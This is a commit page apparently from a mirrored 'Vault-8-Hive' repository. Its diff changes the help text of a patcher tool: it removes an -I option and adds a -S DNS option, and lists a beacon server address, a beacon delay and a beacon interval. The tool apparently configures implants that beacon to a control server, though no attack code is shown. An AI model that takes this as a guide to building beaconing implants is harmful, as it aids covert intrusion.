Projects STRLCPY Vault-8-Hive Commits a4784c48
🤬
  • Fix patcher help menu: deleted -I option, add -S option.

  • Loading...
  • User #142 committed 9 years ago
    a4784c48
    1 parent 55899f40
  • ■ ■ ■ ■
    client/patcher.c
    skipped 112 lines
    113 113  {
    114 114   printf("\n");
    115 115   fprintf(stdout, " %sUsage:%s\n", BLUE, RESET);
    116  - fprintf(stdout, " %s -a address [-d b_delay] [-i interval] (-k idKey | -K idKeyFile) [-I interface] [-p port] [-t t_delay] [-m OS] \n\n", *argv);
     116 + fprintf(stdout, " %s [-a <address>] [-d <b_delay>] [-i <interval>] (-k <idKey> | -K <idKeyFile>) [-S <DNS address>] [-p <port>] [-t <t_delay>] [-m <OS>] \n\n", *argv);
    117 117   fprintf(stdout, " %s-a <address>%s - IP address or hostname of beacon server\n", GREEN, RESET);
    118 118   fprintf(stdout, " %s-d <b_delay>%s - initial delay before first beacon (in seconds), 0 for no beacons.\n", GREEN, RESET);
    119 119   fprintf(stdout, " %s-i <interval>%s - beacon interval (in seconds)\n", GREEN, RESET);
    skipped 515 lines
Please wait...
Page is in error, reload to recover